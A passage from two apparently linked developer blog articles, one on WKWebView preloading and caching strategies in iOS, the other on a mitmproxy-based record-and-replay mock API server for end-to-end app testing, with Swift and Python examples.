If-Modified-Since: Thu, 18 Jul 2024 13:00:00 GMT
If-None-Match: 1234
In iOS, network-related components (URLSession, WKWebView…) handle HTTP Request/Response Cache Headers automatically and manage caching, so we do not need to handle Cache Header parameters ourselves.
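If you want to sanity-check that the system really stored a response, you can query URLCache directly; a small hedged sketch (the URL reuses one of the example URLs from later in this article):

```swift
import Foundation

let request = URLRequest(url: URL(string: "https://zhgchg.li/campaign/summer")!)
if let cached = URLCache.shared.cachedResponse(for: request) {
    // A hit means the response was stored under the HTTP cache rules negotiated with the server.
    print("Cached \(cached.data.count) bytes, storagePolicy: \(cached.storagePolicy.rawValue)")
} else {
    print("No cached response for this request yet.")
}
```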
For more detailed information on how HTTP Cache works, refer to “Understanding the Progressive Understanding of HTTP Cache Mechanism by Huli”.
Returning to iOS, since we can only use Apple WebKit, we can only explore ways to achieve preloading and caching through methods provided by Apple’s WebKit.
The image above provides an overview of all Apple iOS WebKit (WKWebView) related methods introduced by ChatGPT 4o, along with brief explanations. The green section pertains to methods related to data storage.
Sharing a few interesting methods:
As introduced in the previous section on the HTTP Cache mechanism, we can ask the Web Team to enhance the HTTP Cache settings for the activity pages. On the client iOS side, we only need to check the CachePolicy setting, as everything else has been taken care of by the system!
URLSession:
let configuration = URLSessionConfiguration.default
configuration.requestCachePolicy = .useProtocolCachePolicy
let session = URLSession(configuration: configuration)
URLRequest/WKWebView:
var request = URLRequest(url: url)
request.cachePolicy = .reloadRevalidatingCacheData
wkWebView.load(request)
App-wide:
let memoryCapacity = 512 * 1024 * 1024 // 512 MB
let diskCapacity = 10 * 1024 * 1024 * 1024 // 10 GB
let urlCache = URLCache(memoryCapacity: memoryCapacity, diskCapacity: diskCapacity, diskPath: "myCache")

URLCache.shared = urlCache
Individual URLSession:
let memoryCapacity = 512 * 1024 * 1024 // 512 MB
let diskCapacity = 10 * 1024 * 1024 * 1024 // 10 GB
let cache = URLCache(memoryCapacity: memoryCapacity, diskCapacity: diskCapacity, diskPath: "myCache")

let configuration = URLSessionConfiguration.default
configuration.urlCache = cache
Additionally, as mentioned earlier, WKWebView runs on a separate thread outside the main thread of the app, so the cache of URLRequest, URLSession is not shared with WKWebView.
Check if local Cache is being used.
Enable Developer Features in Safari:
Enable isInspectable in WKWebView:
func makeWKWebView() -> WKWebView {
    let webView = WKWebView(frame: .zero)
    webView.isInspectable = true // only available in iOS 16.4 or newer
    return webView
}
Add `webView.isInspectable = true` to the WKWebView so that Safari Developer Tools can be used in Debug builds.
p.s. This is my test WKWebView project opened separately.

Set a breakpoint at `webView.load`.

**Start Testing:**

Build & Run:

When execution reaches the breakpoint at `webView.load`, click "Step Over".

Go back to Safari, select "Develop" in the toolbar -> "Simulator" -> "Your Project" -> "about:blank".
- Since the page has not started loading, the URL will be about:blank.
- If about:blank does not appear, go back to Xcode and click the "Step Over" button again until it appears.

Developer tools corresponding to the page will appear:

Return to Xcode and click "Continue Execution":

Go back to Safari, and in the developer tools you can see the resource loading status and the full developer tools functionality (components, storage space debugging, etc.).

**If there is an HTTP Cache hit for a network resource, the transferred size will display as "Disk":**

You can also click into an entry to view the cache information.

#### Clear WKWebView Cache
```swift
// Clean Cookies
HTTPCookieStorage.shared.removeCookies(since: Date.distantPast)

// Clean Stored Data, Cache Data
let dataTypes = WKWebsiteDataStore.allWebsiteDataTypes()
let store = WKWebsiteDataStore.default()
store.fetchDataRecords(ofTypes: dataTypes) { records in
    records.forEach { record in
        store.removeData(
            ofTypes: record.dataTypes,
            for: [record], // remove only this record's data
            completionHandler: {
                print("clearWebViewCache() - \(record)")
            }
        )
    }
}
```
Use the above method to clear cached resources, local data, and cookie data in WKWebView.
However, improving HTTP Cache only achieves caching (faster on subsequent visits), and preloading (first visit) will not be affected. ✅
class WebViewPreloader {
    static let shared = WebViewPreloader()

    private let webview: WKWebView = WKWebView()

    private init() { }

    func preload(url: URL) {
        let request = URLRequest(url: url)
        Task { @MainActor in
            self.webview.load(request)
        }
    }
}

WebViewPreloader.shared.preload(url: URL(string: "https://zhgchg.li/campaign/summer")!)
After improving HTTP Cache, the second time loading WKWebView will be cached. We can preload all the URLs in the list or homepage in advance to have them cached, making it faster for users when they enter.
> **_After testing, it is theoretically feasible; but the performance impact and network traffic loss are too significant_** _; users may not even go to the detail page, yet we preload every page, which feels a bit like shooting in the dark._

> _Personally, I think it is not feasible in reality, and the disadvantages outweigh the benefits, cutting off one's nose to spite one's face. 😕_

### Enhance HTTP Cache + WKWebView Preload Pure Resources 🎉

Based on the optimization method above, we can combine it with the HTML Link Preload method to preload only the resource files (e.g. .js, .css, font, image...) that will be used by the page, allowing users to use the cached resources directly after entering, without initiating network requests to fetch the resource files.

> **_This means I am not preloading everything on the entire page; I am only preloading the resource files that the page will use, which may also be shared across pages. The page file .html is still fetched from the network and combined with the preloaded files to render the page._**

Please note: we are still using HTTP Cache here, so these resources must also support HTTP Cache, otherwise future requests will still go through the network.

```xml
<!DOCTYPE html>
<html lang="zh-tw">
  <head>
    <link rel="preload" href="https://cdn.zhgchg.li/dist/main.js" as="script">
    <link rel="preload" href="https://image.zhgchg.li/v2/image/get/campaign.jpg" as="image">
    <link rel="preload" href="https://cdn.zhgchg.li/assets/fonts/glyphicons-halflings-regular.woff2" as="font">
    <link rel="preload" href="https://cdn.zhgchg.li/assets/fonts/Simple-Line-Icons.woff2?v=2.4.0" as="font">
  </head>
</html>
```
Common supported file types:
The Web Team will place the above HTML content at a path agreed upon with the App, and our `WebViewPreloader` will be modified to load this path, so that WKWebView parses the `<link>` preload resources and generates caches while loading.
WebViewPreloader.shared.preload(url: URL(string: "https://zhgchg.li/campaign/summer/preload")!)
// or all in one
WebViewPreloader.shared.preload(url: URL(string: "https://zhgchg.li/assets/preload")!)
After testing, a good balance between traffic loss and preloading can be achieved . 🎉
The downside is that maintaining this cache resource list is necessary, and web optimization for page rendering and loading is still required; otherwise, the perceived time for the first page to appear will still be long.
Additionally, considering our old friend URLProtocol, all requests based on the URL Loading System (URLSession, openURL…) can be intercepted and manipulated.
class CustomURLProtocol: URLProtocol {
    override class func canInit(with request: URLRequest) -> Bool {
        // Determine if this request should be handled
        if let url = request.url {
            return url.scheme == "custom"
        }
        return false
    }

    override class func canonicalRequest(for request: URLRequest) -> URLRequest {
        // Return the request
        return request
    }

    override func startLoading() {
        // Handle the request and load data
        // Change to a caching strategy, read files locally first
        if let url = request.url {
            let response = URLResponse(url: url, mimeType: "text/plain", expectedContentLength: -1, textEncodingName: nil)
            self.client?.urlProtocol(self, didReceive: response, cacheStoragePolicy: .notAllowed)

            let data = "This is a custom response!".data(using: .utf8)!
            self.client?.urlProtocol(self, didLoad: data)
            self.client?.urlProtocolDidFinishLoading(self)
        }
    }

    override func stopLoading() {
        // Stop loading data
    }
}

// AppDelegate.swift didFinishLaunchingWithOptions:
URLProtocol.registerClass(CustomURLProtocol.self)
The abstract idea: in the background, secretly send URLRequest -> URLProtocol -> download all the resources yourself; then user -> WKWebView -> Request -> URLProtocol -> respond with the preloaded resources.
Same as mentioned earlier, WKWebView runs on a separate thread outside the main thread of the app, so URLProtocol cannot intercept requests from WKWebView.
But I heard that using dark magic seems possible, not recommended, it may lead to other issues (rejection during review).
This path is blocked ❌.
Apple introduced a new method in iOS 11, which seems to compensate for the inability of WKWebView to use URLProtocol. However, this method is similar to AVPlayer’s ResourceLoader, only system-unrecognized schemes will be handed over to our custom WKURLSchemeHandler for processing.
The abstract idea remains the same in the background, where WKWebView secretly sends Request -> WKURLSchemeHandler -> download all resources by yourself, user -> WKWebView -> Request -> WKURLSchemeHandler -> respond with preloaded resources.
import WebKit

class CustomSchemeHandler: NSObject, WKURLSchemeHandler {
    func webView(_ webView: WKWebView, start urlSchemeTask: WKURLSchemeTask) {
        // Custom handling
        let url = urlSchemeTask.request.url!

        if url.scheme == "mycacher" {
            // Change to a caching strategy, read the file locally first
            let response = URLResponse(url: url, mimeType: "text/html", expectedContentLength: -1, textEncodingName: nil)
            urlSchemeTask.didReceive(response)

            let html = "<html><body><h1>Hello from custom scheme!</h1></body></html>"
            let data = html.data(using: .utf8)!
            urlSchemeTask.didReceive(data)
            urlSchemeTask.didFinish()
        }
    }

    func webView(_ webView: WKWebView, stop urlSchemeTask: WKURLSchemeTask) {
        // Stop
    }
}

let webViewConfiguration = WKWebViewConfiguration()
webViewConfiguration.setURLSchemeHandler(CustomSchemeHandler(), forURLScheme: "mycacher")

let customURL = URL(string: "mycacher://zhgchg.li/campaign/summer")!
webView.load(URLRequest(url: customURL))
- Register a custom scheme on the WKWebViewConfiguration (e.g. `mycacher://`).
- Change the page requests to use `mycacher://` so our Handler can capture them.

Overall, while theoretically feasible, the implementation requires a huge investment; it is not cost-effective and is difficult to scale and keep stable. 😕
I feel the WKURLSchemeHandler approach is better suited to web pages with large resource files that need to be downloaded: declare a custom scheme for the app to handle, and render the page cooperatively.
Another direction is to change the WKWebView page to request resources through an interface defined by the app (WKUserScript) instead of Ajax, XMLHttpRequest, or Fetch, letting the app fetch the resources.
This doesn't help much in our case, because the problem is the slow first screen, not the subsequent loading; and this method creates a deep, strange dependency between the Web and the App 🫥
Due to security issues, only Apple’s own Safari app supports it, WKWebView does not support it❌.
Optimize to improve the performance of loading views in WKWebView.
WKWebView itself is like a skeleton, and the web page is the flesh. After researching, optimizing the skeleton (e.g. reusing WKProcessPool) has limited effect, possibly a difference of 0.0003 -> 0.000015 seconds.
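For completeness, the "reuse the skeleton" idea mentioned above essentially boils down to sharing one WKProcessPool across configurations, roughly like this (a minimal sketch; as noted above, the measured gain was negligible):

```swift
import WebKit

enum WebViewFactory {
    // Share a single process pool so web views can reuse the same web content process and session state.
    static let sharedProcessPool = WKProcessPool()

    static func make() -> WKWebView {
        let configuration = WKWebViewConfiguration()
        configuration.processPool = sharedProcessPool
        return WKWebView(frame: .zero, configuration: configuration)
    }
}
```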
Similar to the Preload method, but instead putting the activity page in the App Bundle or fetching it remotely at startup.
Putting the entire HTML page in the App Bundle may also run into CORS same-origin issues; it feels better to use the "Enhance HTTP Cache + WKWebView Preload Pure Resources" method instead. Bundling the page only increases the App Size, and fetching it remotely at startup is effectively the WKWebView Preload approach. 🫥
Referencing wedevs' optimization suggestions, a frontend HTML page goes through four loading stages: from loading the page file (.html) at the beginning, to First Paint (blank page), then First Contentful Paint (rendering the page skeleton), then First Meaningful Paint (adding page content), and finally Time To Interactive (allowing user interaction).
Testing with our own page: the browser or WKWebView first requests the page body (.html) and then loads the required resources, building the screen for the user according to the code. Comparing with the article, our page jumps almost directly from First Paint (blank) to Time To Interactive (the First Contentful Paint stage only shows the Navigation Bar, which hardly counts…), missing the intermediate rendering stages and therefore extending the user's overall perceived waiting time.
And currently, only resource files have HTTP Cache settings, not the page body.
Additionally, you can refer to Google PageSpeed Insights for optimization suggestions, such as compression, reducing script size, etc.
Because the core of in-app WKWebView is still the web page itself; therefore, adjusting from the frontend web page is a very effective way to make a big difference with a small adjustment. 🎉🎉🎉
A simple implementation, starting from the user experience, adding a Loading Progress Bar, not just showing a blank page to confuse the user, let them know that the page is loading and where the progress is.🎉🎉🎉
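A minimal sketch of that idea: drive a UIProgressView from WKWebView's KVO-compliant estimatedProgress property (layout code omitted, names are illustrative):

```swift
import UIKit
import WebKit

final class WebPageViewController: UIViewController {
    let webView = WKWebView()
    let progressView = UIProgressView(progressViewStyle: .bar)
    private var progressObservation: NSKeyValueObservation?

    override func viewDidLoad() {
        super.viewDidLoad()
        // estimatedProgress goes from 0.0 to 1.0 while the page loads; show it instead of a blank screen.
        progressObservation = webView.observe(\.estimatedProgress, options: [.new]) { [weak self] webView, _ in
            self?.progressView.progress = Float(webView.estimatedProgress)
            self?.progressView.isHidden = webView.estimatedProgress >= 1.0
        }
    }
}
```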
The above is some exploratory research on feasible solutions for WKWebView preloading and caching. The technology is not the biggest issue; the key is the choice of which approaches deliver the most benefit to users at the lowest development cost. Choose well and the goal may be reached with minor changes; choose wrong and it becomes a huge investment of resources that may be hard to maintain and use in the future.
There are always more solutions than difficulties, sometimes it’s just a lack of imagination.
Maybe there are some legendary combinations that I haven’t thought of, welcome everyone to contribute.
The author also mentioned the method of WKURLSchemeHandler.
The complete Demo Repo in the video is as follows:
The sharing about WkWebView in the Old Driver Weekly is also worth a look.
Long-awaited return to writing long articles related to iOS development.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Verification of the feasibility of implementing E2E Testing for existing apps and existing API architecture
Photo by freestocks
As a project that has been operating online for many years, continuously improving stability is a highly challenging issue.
Due to the static, compiled, strongly typed nature of the development languages Swift/Kotlin, and the dynamic-to-static transition from Objective-C to Swift, it is almost impossible to add Unit Testing after the fact if testability (cleanly separated interface dependencies) was not considered during development; yet the refactoring needed to get there can itself introduce instability, which creates a chicken-and-egg problem.
Testing UI interactions and buttons; it can be implemented by slightly decoupling data dependencies in new or existing screens.
Verifying whether the UI display content and style are consistent before and after adjustments; similar to UI Testing, it can be implemented by slightly decoupling data dependencies in new or existing screens.
It is very useful for transitioning from Storyboard/XIB to Code Layout or UIView from OC to Swift; you can directly import pointfreeco / swift-snapshot-testing for quick implementation.
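A hedged example of what such a test looks like with swift-snapshot-testing (the view type is hypothetical; depending on the library version the entry point is `assertSnapshot(of:as:)` or the older `assertSnapshot(matching:as:)`):

```swift
import SnapshotTesting
import UIKit
import XCTest

final class CheckoutButtonSnapshotTests: XCTestCase {
    func testCheckoutButtonRendersTheSameAfterMigration() {
        // Hypothetical view being migrated from XIB to code layout.
        let view = CheckoutButton(title: "Buy Now")
        view.frame = CGRect(x: 0, y: 0, width: 320, height: 44)

        // The first run records a reference image; later runs fail if the rendering changes.
        assertSnapshot(of: view, as: .image)
    }
}
```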
Although we can add UI Testing and SnapShot Testing later, the coverage of these tests is very limited; most errors are not UI style issues but process or logic problems that interrupt user operations. If this occurs during the checkout process, involving revenue, the issue becomes very serious.
As mentioned earlier, it is not feasible to easily add unit tests to the current project or to integrate units for integration testing. For logic and process protection, the remaining method is to perform End-to-End black-box testing from the outside, directly from the user’s perspective, to check whether important processes (registration/checkout, etc.) are functioning normally.
For major function refactoring, you can also establish process tests before refactoring and re-verify after refactoring to ensure that the functionality works as expected.
Refactoring along with adding Unit Testing and Integration Testing to increase stability, breaking the chicken-and-egg problem.
The most direct and brute-force way of End-to-End Testing is to have a QA Team manually test according to the Test Plan, and then continuously optimize or introduce automated operations. Calculating the cost, it would require at least 2 engineers + 1 Leader spending at least half a year to a year to see results.
Evaluating the time and cost, is there anything we can do in the current situation or prepare for the future QA Team so that when there is a QA Team, we can directly jump to optimization and automation operations, or even introduce AI?
At this stage, the goal is to introduce automated End-to-End Testing, placed in the CI/CD process for automatic checks. The test content does not need to be too comprehensive; as long as it can prevent major process issues, it is already very valuable. Later, we can gradually iterate the Test Plan to cover more areas.
The principle of the App is more like using another test App to operate our tested App, and then finding the target object from the View Hierarchy. During testing, we cannot obtain the Log or Output of the tested App because they are essentially two different Apps.
iOS needs to improve the View Accessibility Identifier to increase efficiency and accuracy and handle Alerts (e.g., push notification requests).
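Whichever runner drives the app, stable identifiers help it find elements; for illustration, here is a hedged XCUITest-flavored sketch of both points (all identifiers are hypothetical, and in the app target the views are given matching `accessibilityIdentifier` values first):

```swift
import XCTest

final class PurchaseFlowUITests: XCTestCase {
    // In the app target, the views are tagged beforehand, e.g.
    // productCardView.accessibilityIdentifier = "home_product_card_0"
    func testOpenFirstProduct() {
        let app = XCUIApplication()
        app.launch()

        // Auto-dismiss system alerts, e.g. the push notification permission request.
        addUIInterruptionMonitor(withDescription: "System Alert") { alert in
            guard alert.buttons["Allow"].exists else { return false }
            alert.buttons["Allow"].tap()
            return true
        }

        app.otherElements["home_product_card_0"].tap()
        app.tap() // an interaction is needed for the interruption monitor to fire
        XCTAssertTrue(app.buttons["product_buy_button"].waitForExistence(timeout: 5))
    }
}
```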
In previous implementations on Android, there was an issue where the target object could not be found when mixing Compose and Fragment, but according to a teammate, the new version of Compose has resolved this.
Besides the common traditional issues mentioned above, a bigger problem is the difficulty of integrating dual platforms (writing one test to run on two platforms). Currently, we are trying to use a new testing tool mobile-dev-inc / maestro:
You can write a Test Plan in YAML and then execute tests on dual platforms. For detailed usage and trial experiences, stay tuned for another teammate’s article sharing cc’ed Alejandra Ts. 😝.
The biggest testing variable for App E2E Testing is API data. If we cannot provide guaranteed data, it will increase the instability of the tests, leading to false positives, and eventually, everyone will lose confidence in the Test Plan.
For example, in testing the checkout process, if the product might be taken off the shelf or disappear, and these status changes are not controllable by the App, the above situation is very likely to occur.
There are many ways to solve data issues, such as establishing a clean Staging or Testing environment, or an Auto-Gen Mock API Server based on Open API. However, these all rely on the backend and external factors of the API. Additionally, the backend API, like the App, is an online project that has been running for many years, and some specifications are still being restructured and migrated, making it temporarily impossible to have a Mock Server.
Given these factors, if we get stuck here, the problem will remain unchanged, and the chicken-and-egg problem cannot be broken. We really can only “take the risk” and make changes first, dealing with issues as they arise.
“As long as the mindset doesn’t slip, there are more solutions than difficulties.”
We can think differently. If the UI can be snapshotted into images for replay verification testing, can the API do the same? Can we save the API Request & Response and replay them for verification testing later?
This introduces the main point of this article: establishing a “Snapshot API Local Mock Server” to record API Requests & Replay Responses, removing the dependency on API data.
This article only provides a Proof of Concept (POC) and has not yet fully implemented high-coverage End-to-End Testing. Therefore, the approach is for reference only. I hope it provides new insights for everyone in the current environment.
[Record] — After completing the development of the End-to-End Testing Test Case, enable the recording parameter and execute the test once. During this process, all API Requests & Responses will be saved in the respective Test Case directories.
[Replay] — When running the Test Case later, the corresponding recorded Response Data will be found from the Test Case directory according to the request to complete the testing process.
Suppose we want to test the purchase process. The user opens the App, clicks on the product card on the homepage to enter the product detail page, clicks the purchase button at the bottom, a login box pops up to complete the login, completes the purchase, and a purchase success prompt pops up:
How UI Testing controls button clicks, input box inputs, etc., is not the main focus of this article; you can refer to existing testing frameworks for direct use.
To achieve Record & Replay API, a Proxy needs to be added between the App and the API to perform a man-in-the-middle attack. You can refer to my earlier article “The APP uses HTTPS transmission, but the data is still stolen.”
In simple terms, there is an additional proxy transmitter between the App and the API, like passing notes. The requests and responses exchanged between both parties will go through it. It can open the content of the notes and can also forge the content of the notes for both parties without them noticing.
Regular Proxy:
A regular proxy is when the client sends a request to the proxy server, the proxy server forwards the request to the target server, and then returns the response from the target server to the client. In a regular proxy mode, the proxy server initiates the request on behalf of the client. The client needs to explicitly specify the address and port number of the proxy server and send the request to the proxy server.
Reverse Proxy:
A reverse proxy is the opposite of a regular proxy. It sits between the target server and the client. The client sends a request to the reverse proxy server, which forwards the request to the backend target server according to certain rules and returns the response from the target server to the client. For the client, the target server appears to be the reverse proxy server, and the client does not need to know the real address of the target server.
For our needs, either regular or reverse proxy can achieve the goal. The only consideration is the method of proxy setup:
Regular Proxy requires setting up a Proxy in the network settings on the computer, phone, or emulator:
Reverse Proxy requires changing the API Host in the Codebase and declaring all API Domains to be proxied:
For iOS App, the following example uses iOS & Reverse Proxy for POC. The same can be applied to Android.
We need to let the App know it’s running End-to-End Testing to add the API Host replacement logic in the App program:
// UI Testing Target:
let app = XCUIApplication()
app.launchArguments = ["duringE2ETesting"]
app.launch()
We make the judgment and replacement in the Network layer. This adjustment is unavoidable; beyond it, try to avoid changing the App's code just for testing.
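On the App side, a minimal sketch of that judgment in the Network layer (APIEnvironment is a hypothetical helper; the duringE2ETesting launch argument matches the UI Testing snippet above, and 127.0.0.1:8080 is mitmproxy's default listening address when running on the simulator):
import Foundation

// Hypothetical helper in the App's Network layer that decides which API host to use.
enum APIEnvironment {
    static var baseURL: URL {
        // Launch arguments set by the UI test target are visible through ProcessInfo.
        if ProcessInfo.processInfo.arguments.contains("duringE2ETesting") {
            return URL(string: "http://127.0.0.1:8080")! // Reverse proxy started by mitmdump
        } else {
            return URL(string: "https://yourapihost.com")!
        }
    }
}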
You can also use Swift to develop a Swift Server to achieve this. This article uses the MITMProxy tool for POC.
The implementation content below has been open-sourced to the mitmproxy-rodo project. Feel free to refer to and use it directly.
Some structures and content of this article have been adjusted, and the following adjustments were made when open-sourced:
host / requestPath / method / hash
⚠️ The following script is for Demo reference only, subsequent script adjustments will be moved to the open-source project maintenance.
Follow the MITMProxy official website to complete the installation:
brew install mitmproxy
For detailed usage of MITMProxy, you can refer to my earlier article “The APP uses HTTPS transmission, but the data is still stolen.”
- mitmproxy provides an interactive command-line interface.
- mitmweb provides a browser-based graphical user interface.
- mitmdump provides non-interactive terminal output.

Since MITMProxy's Reverse Proxy does not natively provide the functionality to record (dump) requests & map requests for replay, we need to write a script to achieve this.
mock.py:
"""
+Example:
+ Record: mitmdump -m reverse:https://yourapihost.com -s mock.py --set record=true --set dumper_folder=loginFlow --set config_file=config.json
+ Replay: mitmdump -m reverse:https://yourapihost.com -s mock.py --set dumper_folder=loginFlow --set config_file=config.json
+"""
+
+import re
+import logging
+import mimetypes
+import os
+import json
+import hashlib
+
+from pathlib import Path
+from mitmproxy import ctx
+from mitmproxy import http
+
+class MockServerHandler:
+
+ def load(self, loader):
+ self.readHistory = {}
+ self.configuration = {}
+
+ loader.add_option(
+ name="dumper_folder",
+ typespec=str,
+ default="dump",
+ help="Response Dump directory, can be created by Test Case Name",
+ )
+
+ loader.add_option(
+ name="network_restricted",
+ typespec=bool,
+ default=True,
+ help="No Mapping data locally... setting true will return 404, false will make a real request to get data.",
+ )
+
+ loader.add_option(
+ name="record",
+ typespec=bool,
+ default=False,
+ help="Set true to record Request's Response",
+ )
+
+ loader.add_option(
+ name="config_file",
+ typespec=str,
+ default="",
+ help="Set file path, example file below",
+ )
+
+ def configure(self, updated):
+ self.loadConfig()
+
+ def loadConfig(self):
+ configFile = Path(ctx.options.config_file)
+ if ctx.options.config_file == "" or not configFile.exists():
+ return
+
+ self.configuration = json.loads(open(configFile, "r").read())
+
+ def hash(self, request):
+ query = request.query
+ requestPath = "-".join(request.path_components)
+
+ ignoredQueryParameterByPaths = self.configuration.get("ignored", {}).get("paths", {}).get(request.host, {}).get(requestPath, {}).get(request.method, {}).get("queryParamters", [])
+ ignoredQueryParameterGlobal = self.configuration.get("ignored", {}).get("global", {}).get("queryParamters", [])
+
+ filteredQuery = []
+ if query:
+ filteredQuery = [(key, value) for key, value in query.items() if key not in ignoredQueryParameterByPaths + ignoredQueryParameterGlobal]
+
+ formData = []
+ if request.get_content() != None and request.get_content() != b'':
+ formData = json.loads(request.get_content())
+
+ # or just formData = request.urlencoded_form
+ # or just formData = request.multipart_form
+ # depends on your api design
+
+ ignoredFormDataParametersByPaths = self.configuration.get("ignored", {}).get("paths", {}).get(request.host, {}).get(requestPath, {}).get(request.method, {}).get("formDataParameters", [])
+ ignoredFormDataParametersGlobal = self.configuration.get("ignored", {}).get("global", {}).get("formDataParameters", [])
+
+ filteredFormData = []
+ if formData:
+ filteredFormData = [(key, value) for key, value in formData.items() if key not in ignoredFormDataParametersByPaths + ignoredFormDataParametersGlobal]
+
+ # Serialize the dictionary to a JSON string
+ hashData = {"query":sorted(filteredQuery), "form": sorted(filteredFormData)}
+ json_str = json.dumps(hashData, sort_keys=True)
+
+ # Apply SHA-256 hash function
+ hash_object = hashlib.sha256(json_str.encode())
+ hash_string = hash_object.hexdigest()
+
+ return hash_string
+
+ def readFromFile(self, request):
+ host = request.host
+ method = request.method
+ hash = self.hash(request)
+ requestPath = "-".join(request.path_components)
+
+ folder = Path(ctx.options.dumper_folder) / host / method / requestPath / hash
+
+ if not folder.exists():
+ return None
+
+ content_type = request.headers.get("content-type", "").split(";")[0]
+ ext = mimetypes.guess_extension(content_type) or ".json"
+
+
+ count = self.readHistory.get(host, {}).get(method, {}).get(requestPath, {}) or 0
+
+ filepath = folder / f"Content-{str(count)}{ext}"
+
+ while not filepath.exists() and count > 0:
+ count = count - 1
+ filepath = folder / f"Content-{str(count)}{ext}"
+
+ if self.readHistory.get(host) is None:
+ self.readHistory[host] = {}
+ if self.readHistory.get(host).get(method) is None:
+ self.readHistory[host][method] = {}
+ if self.readHistory.get(host).get(method).get(requestPath) is None:
+ self.readHistory[host][method][requestPath] = {}
+
+ if filepath.exists():
+ headerFilePath = folder / f"Header-{str(count)}.json"
+ if not headerFilePath.exists():
+ headerFilePath = None
+
+ count += 1
+ self.readHistory[host][method][requestPath] = count
+
+ return {"content": filepath, "header": headerFilePath}
+ else:
+ return None
+
+
+ def saveToFile(self, request, response):
+ host = request.host
+ method = request.method
+ hash = self.hash(request)
+ requestPath = "-".join(request.path_components)
+
+ iterable = self.configuration.get("ignored", {}).get("paths", {}).get(request.host, {}).get(requestPath, {}).get(request.method, {}).get("iterable", False)
+
+ folder = Path(ctx.options.dumper_folder) / host / method / requestPath / hash
+
+ # create dir if not exists
+ if not folder.exists():
+ os.makedirs(folder)
+
+ content_type = response.headers.get("content-type", "").split(";")[0]
+ ext = mimetypes.guess_extension(content_type) or ".json"
+
+ repeatNumber = 0
+ filepath = folder / f"Content-{str(repeatNumber)}{ext}"
+ while filepath.exists() and iterable == False:
+ repeatNumber += 1
+ filepath = folder / f"Content-{str(repeatNumber)}{ext}"
+
+ # dump to file
+ with open(filepath, "wb") as f:
+ f.write(response.content or b'')
+
+
+ headerFilepath = folder / f"Header-{str(repeatNumber)}.json"
+ with open(headerFilepath, "wb") as f:
+ responseDict = dict(response.headers.items())
+ responseDict['_status_code'] = response.status_code
+ f.write(json.dumps(responseDict).encode('utf-8'))
+
+ return {"content": filepath, "header": headerFilepath}
+
+ def request(self, flow):
+ if ctx.options.record != True:
+ host = flow.request.host
+ path = flow.request.path
+
+ result = self.readFromFile(flow.request)
+ if result is not None:
+ content = b''
+ headers = {}
+ statusCode = 200
+
+ if result.get('content') is not None:
+ content = open(result['content'], "r").read()
+
+ if result.get('header') is not None:
+ headers = json.loads(open(result['header'], "r").read())
+ statusCode = headers['_status_code']
+ del headers['_status_code']
+
+
+ headers['_responseFromMitmproxy'] = '1'
+ flow.response = http.Response.make(statusCode, content, headers)
+ logging.info("Fullfill response from local with "+str(result['content']))
+ return
+
+ if ctx.options.network_restricted == True:
+ flow.response = http.Response.make(404, b'', {'_responseFromMitmproxy': '1'})
+
+ def response(self, flow):
+ if ctx.options.record == True and flow.response.headers.get('_responseFromMitmproxy') != '1':
+ result = self.saveToFile(flow.request, flow.response)
+ logging.info("Save response to local with "+str(result['content']))
+
+addons = [MockServerHandler()]
+
You can refer to the official documentation and adjust the script content as needed.
The design logic of this script is as follows:
- Dump directory structure: dumper_folder (a.k.a. the Test Case name) / the reverse-proxied API host / HTTP Method / path components joined with "-" (e.g. app/launch -> app-launch) / Hash(GET query & POST content).
- Response bodies are saved as Content-0.xxx, Content-1.xxx (the second occurrence of the same request), and so on; Response Header information is saved as Header-0.json (following the same numbering logic as Content-x).
- When record is True, it will hit the target server to fetch the response and save it according to the structure above; when False, it will only read data locally (equivalent to Replay mode).
- When network_restricted is True, if there is no matching data locally it will directly respond with 404; when False, it will hit the target server to fetch the data.
- _responseFromMitmproxy is used to inform the response method that the current response comes from Local and can be ignored; _status_code borrows a field in Header-x.json to store the HTTP response status code.
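For example, a recorded add-to-cart request might end up in a structure like this (the host, path, and hash below are purely illustrative):
addCart/                      <- dumper_folder (Test Case name)
  yourapihost.com/            <- the reverse-proxied API host
    POST/                     <- HTTP Method
      add-to-cart/            <- path components joined with "-"
        3fa1.../              <- SHA-256 hash of the filtered query & form data
          Content-0.json      <- response body of the first occurrence
          Header-0.json       <- response headers plus _status_code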
The config_file.json configuration file logic is designed as follows:
{
  "ignored": {
    "paths": {
      "yourapihost.com": {
        "add-to-cart": {
          "POST": {
            "queryParamters": [
              "created_timestamp"
            ],
            "formDataParameters": []
          }
        },
        "api-status-checker": {
          "GET": {
            "iterable": true
          }
        }
      }
    },
    "global": {
      "queryParamters": [
        "timestamp"
      ],
      "formDataParameters": []
    }
  }
}
queryParamters & formDataParameters:
Because some API parameters may change with each call (for example, some endpoints carry time parameters), depending on the server's design the Hash(Query Parameter & Body Content) value will be different during the replayed request, resulting in no mapping to a local response. Therefore, an additional config.json is used to handle this situation. You can set certain parameters to be excluded from the hash by endpoint path or globally, so you can get the same mapping result.

iterable:
Because some polling check APIs may be called repeatedly at regular intervals, depending on the server's design many Content-x.xxx & Header-x.json files will be generated; if we don't care about that, we can set it to true, and the response will keep being saved and overwritten to the first files, Content-0.xxx & Header-0.json.
Enable Reverse Proxy Record Mode:
mitmdump -m reverse:https://yourapihost.com -s mock.py --set record=true --set dumper_folder=loginFlow --set config_file=config.json
Enable Reverse Proxy Replay Mode:
mitmdump -m reverse:https://yourapihost.com -s mock.py --set dumper_folder=loginFlow --set config_file=config.json
And ensure that during testing, the API is switched to http://127.0.0.1:8080
mitmdump -m reverse:https://yourapihost.com -s mock.py --set record=true --set dumper_folder=addCart --set config_file=config.json
Using the Pinkoi iOS App as an example, test the following flow:
Launch App -> Home -> Scroll Down -> Similar to Wish List Items Section -> First Product -> Click First Product -> Enter Product Page -> Click Add to Cart -> UI Response Added to Cart -> Test Successful ✅
The method of UI automation operation was mentioned earlier, here we manually test the same flow to verify the results.
After the operation is completed, you can press ^ + C to terminate the Snapshot API Mock Server and check the recording results in the file directory:
mitmdump -m reverse:https://yourapihost.com -s mock.py --set dumper_folder=addCart --set config_file=config.json
(network_restricted is set to True by default, so when there is no matching local data it will directly return 404 instead of fetching it from the network.)

The proof of concept is successful. We can indeed use the Reverse Proxy Server to store API Requests & Responses and use it as a Mock API Server to respond with data to the App during testing 🎉🎉🎉.
This article only discusses the proof of concept. There are still many areas to be improved and more features to be implemented.
#...
    def response(self, flow):
        setCookies = flow.response.headers.get_all("set-cookie")
